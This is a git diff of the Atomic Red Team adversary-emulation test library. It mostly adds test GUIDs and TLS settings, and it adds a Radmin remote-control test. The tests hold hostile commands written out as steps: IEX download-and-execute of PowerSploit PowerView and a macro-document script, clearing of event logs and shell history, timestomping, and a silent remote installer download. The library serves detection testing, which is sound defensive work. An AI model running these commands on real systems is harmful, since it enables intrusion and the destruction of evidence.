+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 84f64dda..193d79de 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -53,6 +53,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
     name: powershell
 - name: Find local admins on all machines in domain (PowerView)
@@ -63,6 +64,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
     name: powershell
 - name: Find Local Admins via Group Policy (PowerView)
@@ -77,7 +79,9 @@ atomic_tests:
       type: Path
       default: $env:COMPUTERNAME
   executor:
-    command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
+    command: | 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
     name: powershell
 - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
   auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -123,6 +127,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md
index 3f420431..cc798f16 100644
--- a/atomics/T1070.001/T1070.001.md
+++ b/atomics/T1070.001/T1070.001.md
@@ -27,10 +27,14 @@ Upon execution this test will clear Windows Event Logs. Open the System.evtx log
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | log_name | Windows Log Name, ex System | String | System|
 
@@ -58,6 +62,10 @@ Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs a
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498
+
+
+
 
 
 
@@ -86,6 +94,10 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e
+
+
+
 
 
 
@@ -93,7 +105,8 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
 ```
 
@@ -108,7 +121,7 @@ try {
   New-Object -COMObject "Word.Application" | Out-Null
   Stop-Process -Name "winword"
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml
index 1a95ff41..fdd29975 100644
--- a/atomics/T1070.001/T1070.001.yaml
+++ b/atomics/T1070.001/T1070.001.yaml
@@ -54,7 +54,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft Word manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
     name: powershell
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md
index 9600f758..e75d68d2 100644
--- a/atomics/T1070.002/T1070.002.md
+++ b/atomics/T1070.002/T1070.002.md
@@ -28,6 +28,10 @@ Delete system and audit logs
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683
+
+
+
 
 
 
@@ -53,10 +57,14 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of mail spool | String | root|
 
@@ -82,10 +90,14 @@ This test overwrites the specified log. This technique was used by threat actor
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | log_path | Path of specified log | Path | /var/log/secure|
 
diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md
index f2aa13b5..8d5e8582 100644
--- a/atomics/T1070.003/T1070.003.md
+++ b/atomics/T1070.003/T1070.003.md
@@ -45,6 +45,10 @@ Clears bash history via rm
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** a934276e-2be5-4a36-93fd-98adbb5bd4fc
+
+
+
 
 
 
@@ -69,6 +73,10 @@ Clears bash history via rm
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
+
+
+
 
 
 
@@ -93,6 +101,10 @@ Clears bash history via cat /dev/null
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** b1251c35-dcd3-4ea1-86da-36d27b54f31f
+
+
+
 
 
 
@@ -117,6 +129,10 @@ Clears bash history via a symlink to /dev/null
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
+
+
+
 
 
 
@@ -141,6 +157,10 @@ Clears bash history via truncate
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 47966a1d-df4f-4078-af65-db6d9aa20739
+
+
+
 
 
 
@@ -165,6 +185,10 @@ Clears the history of a bunch of different shell types by setting the history si
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 7e6721df-5f08-4370-9255-f06d8a77af4c
+
+
+
 
 
 
@@ -191,6 +215,10 @@ Clears the history and disable bash history logging of the current shell and fut
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 784e4011-bd1a-4ecd-a63a-8feb278512e6
+
+
+
 
 
 
@@ -224,6 +252,10 @@ Using a space before a command causes the command to not be logged in the Bash H
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 53b03a54-4529-4992-852d-a00b4b7215a6
+
+
+
 
 
 
@@ -249,6 +281,10 @@ Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh clie
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 5f8abd62-f615-43c5-b6be-f780f25790a1
+
+
+
 
 
 
@@ -271,7 +307,7 @@ userdel -f testuser1
 ##### Check Prereq Commands:
 ```sh
 /usr/sbin/useradd testuser1
-echo pwd101! | passwd testuser1 --stdin 
+echo pwd101! | passwd testuser1 --stdin
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -291,6 +327,10 @@ Prevents Powershell history
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2f898b81-3e97-4abb-bc3f-a95138988370
+
+
+
 
 
 
@@ -319,6 +359,10 @@ Clears Powershell history
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** da75ae8d-26d6-4483-b0fe-700e4df4f037
+
+
+
 
 
 
diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md
index 9552d0c2..f5bd9b21 100644
--- a/atomics/T1070.004/T1070.004.md
+++ b/atomics/T1070.004/T1070.004.md
@@ -35,10 +35,14 @@ Delete a single file from the temporary directory
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
 
@@ -64,10 +68,14 @@ Recursively delete the temporary directory and all files contained within it
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
 
@@ -93,10 +101,14 @@ Use the `shred` command to overwrite the temporary file and then delete it
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 039b4b10-2900-404b-b67f-4b6d49aa6499
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
 
@@ -123,10 +135,14 @@ Upon execution, no output will be displayed. Use File Explorer to verify the fil
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 861ea0b4-708a-4d17-848d-186c9c7f17e3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%&#92;deleteme_T1551.004|
 
@@ -145,7 +161,7 @@ del /f #{file_to_delete}
 ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -165,10 +181,14 @@ Upon execution, no output will be displayed. Use File Explorer to verify the fol
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ded937c4-2add-42f7-9c2c-c742b7a98698
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%&#92;deleteme_T1551.004|
 
@@ -187,7 +207,7 @@ rmdir /s /q #{folder_to_delete}
 ##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete})
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -206,10 +226,14 @@ Delete a single file from the temporary directory using Powershell. Upon executi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;deleteme_T1551.004|
 
@@ -228,7 +252,7 @@ Remove-Item -path #{file_to_delete}
 ##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} 
+if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -247,10 +271,14 @@ Recursively delete a folder in the temporary directory using Powershell. Upon ex
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** edd779e4-a509-4cba-8dfa-a112543dbfb1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;deleteme_folder_T1551.004|
 
@@ -269,7 +297,7 @@ Remove-Item -Path #{folder_to_delete} -Recurse
 ##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} 
+if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -288,6 +316,10 @@ This test deletes the entire root filesystem of a Linux system. This technique w
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** f3aa95fe-4f10-4485-ad26-abf22a764c52
+
+
+
 
 
 
@@ -313,6 +345,10 @@ before and after the test to verify that the number of prefetch files decreases
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 36f96049-0ad7-4a5f-8418-460acaeb92fb
+
+
+
 
 
 
@@ -341,10 +377,14 @@ https://twitter.com/SBousseaden/status/1197524463304290305?s=20
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 69f50a5f-967c-4327-a5bb-e1a9a9983785
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;TeamViewer_54.log|
 
@@ -363,7 +403,7 @@ Remove-Item #{teamviewer_log_file}
 ##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} 
+if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1070.005/T1070.005.md b/atomics/T1070.005/T1070.005.md
index ca630c36..c27abeb0 100644
--- a/atomics/T1070.005/T1070.005.md
+++ b/atomics/T1070.005/T1070.005.md
@@ -19,10 +19,14 @@ Add a Network Share utilizing the command_prompt
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 14c38f32-6509-46d8-ab43-d53e32d2b131
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | share_name | Share to add. | string | &#92;&#92;test&#92;share|
 
@@ -49,10 +53,14 @@ Removes a Network Share utilizing the command_prompt
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 09210ad5-1ef2-4077-9ad3-7351e13e9222
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | share_name | Share to remove. | string | &#92;&#92;test&#92;share|
 
@@ -78,10 +86,14 @@ Removes a Network Share utilizing PowerShell
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0512d214-9512-4d22-bde7-f37e058259b3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | share_name | Share to remove. | string | &#92;&#92;test&#92;share|
 
diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md
index 224f3a98..752ef9b0 100644
--- a/atomics/T1070.006/T1070.006.md
+++ b/atomics/T1070.006/T1070.006.md
@@ -31,10 +31,14 @@ Stomps on the access timestamp of a file
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
 
@@ -60,10 +64,14 @@ Stomps on the modification timestamp of a file
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
 
@@ -92,10 +100,14 @@ Sudo or root privileges are required to change date. Use with caution.
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
 
@@ -127,10 +139,14 @@ This technique was used by the threat actor Rocke during the compromise of Linux
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
 | reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
@@ -158,10 +174,14 @@ To verify execution, use File Explorer to view the Properties of the file and ob
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00|
 | file_path | Path of file to change creation timestamp | Path | $env:TEMP&#92;T1551.006_timestomp.txt|
@@ -185,7 +205,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore
 ##### Description: A file must exist at the path (#{file_path}) to change the creation time on
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -206,10 +226,14 @@ To verify execution, use File Explorer to view the Properties of the file and ob
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f8f6634d-93e1-4238-8510-f8a90a20dcf2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00|
 | file_path | Path of file to change modified timestamp | Path | $env:TEMP&#92;T1551.006_timestomp.txt|
@@ -233,7 +257,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore
 ##### Description: A file must exist at the path (#{file_path}) to change the modified time on
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -254,10 +278,14 @@ To verify execution, use File Explorer to view the Properties of the file and ob
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** da627f63-b9bd-4431-b6f8-c5b44d061a62
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00|
 | file_path | Path of file to change last access timestamp | Path | $env:TEMP&#92;T1551.006_timestomp.txt|
@@ -281,7 +309,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore
 ##### Description: A file must exist at the path (#{file_path}) to change the last access time on
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -305,10 +333,14 @@ Successful execution will include the placement of kxwn.lock in #{file_path} and
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d7512c33-3a75-4806-9893-69abc3ccdd43
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | File path for timestomp payload | String | $env:appdata&#92;Microsoft|
 
@@ -333,7 +365,7 @@ Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
 ##### Description: timestomp.ps1 must be present in #{file_path}.
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -342,7 +374,7 @@ Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal
 ##### Description: kxwn.lock must be present in #{file_path}.
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} 
+if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md
index 92588a46..d91dd8db 100644
--- a/atomics/T1070/T1070.md
+++ b/atomics/T1070/T1070.md
@@ -18,6 +18,10 @@ will be displayed. More information about fsutil can be found at https://docs.mi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b4115c7a-0e92-47f0-a61e-17e7218b2435
+
+
+
 
 
 
diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md
index f1ba954c..8722d0bc 100644
--- a/atomics/T1071.001/T1071.001.md
+++ b/atomics/T1071.001/T1071.001.md
@@ -24,10 +24,14 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 81c13829-f6c9-45b8-85a6-053366d55297
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Default domain to simulate against | string | www.google.com|
 
@@ -59,10 +63,14 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dc3488b0-08c7-4fea-b585-905c83b48180
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Default domain to simulate against | string | www.google.com|
 | curl_path | path to curl.exe | path | C:&#92;Windows&#92;System32&#92;Curl.exe|
@@ -85,7 +93,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
 ##### Description: Curl must be installed on system
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{curl_path}) {exit 0} else {exit 1} 
+if (Test-Path #{curl_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -109,10 +117,14 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Default domain to simulate against | string | www.google.com|
 
diff --git a/atomics/T1071.004/T1071.004.md b/atomics/T1071.004/T1071.004.md
index 22de47a9..d637d611 100644
--- a/atomics/T1071.004/T1071.004.md
+++ b/atomics/T1071.004/T1071.004.md
@@ -25,10 +25,14 @@ A custom domain and sub-domain will need to be passed as input parameters for th
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1700f5d6-5a44-487b-84de-bc66f507b0a6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | query_type | DNS query type | string | TXT|
 | subdomain | Subdomain prepended to the domain name | string | atomicredteam|
@@ -59,10 +63,14 @@ A custom domain and sub-domain will need to be passed as input parameters for th
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | runtime | Time in minutes to run the simulation | integer | 30|
 | domain | Default domain to simulate against | string | 127.0.0.1.xip.io|
@@ -96,10 +104,14 @@ The simulation involves sending DNS queries that gradually increase in length un
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fef31710-223a-40ee-8462-a396d6b66978
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | query_type | DNS query type | string | TXT|
 | subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte|
@@ -133,10 +145,14 @@ https://github.com/lukebaggett/dnscat2-powershell
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e7bf9802-2e78-4db9-93b5-181b7bcd37d7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com|
 | server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1|
diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md
new file mode 100644
index 00000000..e4d9008d
--- /dev/null
+++ b/atomics/T1072/T1072.md
@@ -0,0 +1,61 @@
+# T1072 - Software Deployment Tools
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1072)
+<blockquote>Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).
+
+Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
+
+The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Radmin Viewer Utility](#atomic-test-1---radmin-viewer-utility)
+
+
+<br/>
+
+## Atomic Test #1 - Radmin Viewer Utility
+An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b4988cad-6ed2-434d-ace5-ea2670782129
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| radmin_installer | Radmin Viewer installer | Path | %TEMP%&#92;RadminViewer.msi|
+| radmin_exe | The radmin.exe executable from RadminViewer.msi | Path | %PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+"#{radmin_exe}"
+```
+
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
+##### Check Prereq Commands:
+```cmd
+if not exist "#{radmin_exe}" (exit /b 1)
+```
+##### Get Prereq Commands:
+```cmd
+echo Downloading radmin installer
+bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+msiexec /i "#{radmin_installer}" /qn
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml
new file mode 100644
index 00000000..cecdcede
--- /dev/null
+++ b/atomics/T1072/T1072.yaml
@@ -0,0 +1,34 @@
+attack_technique: T1072
+display_name: Software Deployment Tools
+atomic_tests:
+- name: Radmin Viewer Utility 
+  auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+  description: |
+    An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
+  supported_platforms:
+    - windows
